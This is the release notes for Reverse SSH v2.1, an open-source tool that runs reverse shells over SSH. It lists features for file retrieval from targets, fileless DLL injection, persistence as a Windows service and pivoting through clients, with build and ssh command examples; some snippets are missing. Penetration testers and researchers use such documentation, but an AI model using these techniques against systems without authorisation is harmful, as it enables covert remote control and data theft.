Reverse SSH v2.1 releases: SSH based reverse shell
Want to use SSH for reverse shells? Now you can.
- Manage and connect to reverse shells with native SSH syntax
- Dynamic, local, and remote forwarding
- Native SCP and SFTP implementations for retrieving files from your targets
- Full Windows shell
- Mutual client & server authentication to create high trust control channels
Specify a default server at build time:
Built-in Web Server
The RSSH server can also run an HTTP server on the same port as the RSSH server listener, which serves the client binaries. The server binary must be placed in the project's bin/ folder, because it needs to find the client source.
Then you can download it as follows:
Windows DLL Generation
You can compile the client as a DLL to be loaded with something like Invoke-ReflectivePEInjection. This needs a cross compiler if you are building on Linux; use mingw-w64-gcc.
CC=x86_64-w64-mingw32-gcc GOOS=windows RSSH_HOMESERVER=192.168.1.1:2343 make client_dll
When the RSSH server has the web server enabled, you can also compile it with the link command:
This is useful when you want to do a fileless injection of the rssh client.
SSH allows subsystems to be defined and invoked with the -s flag. In RSSH this is repurposed to provide special commands for particular platforms.
list: Lists available subsystems
sftp: Runs the sftp handler to transfer files
setgid: Attempt to change group
setuid: Attempt to change user
service: Installs or removes the rssh binary as a Windows service; requires administrative rights
# Install the rssh binary as a service (Windows only)
ssh -J your.rssh.server.com:3232 test-pc.user.test-pc -s service --install
Windows Service Integration
The client RSSH binary supports being run within a Windows service and won't time out after 10 seconds. This is great for creating persistent management services.
Full Windows Shell Support
Most reverse shells for Windows struggle to produce a shell environment that supports resizing, copying, pasting and all the other features we're very fond of. This project uses ConPTY on newer versions of Windows, and the winpty library (which self-unpacks) on older versions, so almost all versions of Windows should net you a nice shell.
The RSSH server can send out raw HTTP requests (webhooks), configured with the webhook command from the terminal interface.
First, enable a webhook:
$ ssh your.rssh.server.com -p 3232
catcher$ webhook --on http://localhost:8080/
Then disconnect or connect a client; this will trigger a POST request with the following format.
RSSH and SSH support creating tun/tap interfaces that let you route traffic and create a pseudo-VPN. It takes a bit more setup than a plain local or remote forward (-L, -R), but in this mode you can also send UDP and ICMP.
First set up a tun (layer 3) device on your local machine.
Install a client on a remote machine; this will not work if the RSSH client is on the same host as your tun device.
ssh -J your.rssh.server.com:3232 user.wombo -w 0:any
This has some limitations: it can only send UDP/TCP/ICMP, not arbitrary layer 3 protocols. ICMP is best effort and may use the remote host's ping tool, since ICMP sockets are privileged on most machines. Tap devices (layer 2 VPN) are also not supported, as that would require administrative access.
This release adds new functionality to the listen server console command and a client feature (hence the version bump).
listen now takes a flag such as -c to denote whether it works on the server or the client control port. This allows you to open the server control port on a client.
# Open the server listening port on all (*) clients on tcp port 1111
listen -c * --on :1111
This means that new clients can connect to any existing client on port 1111 and be controllable.
Unfortunately, clients below v2.1.0 will require just starting a remote forward with regular ssh syntax (
- --proxy to 'bake' in a proxy address on compilation
- Makefile now strips off home path with
- The proxy variable can now be baked into DLLs and regular golang binaries with the
Install & Use
Copyright (c) 2022, NHAS
All rights reserved.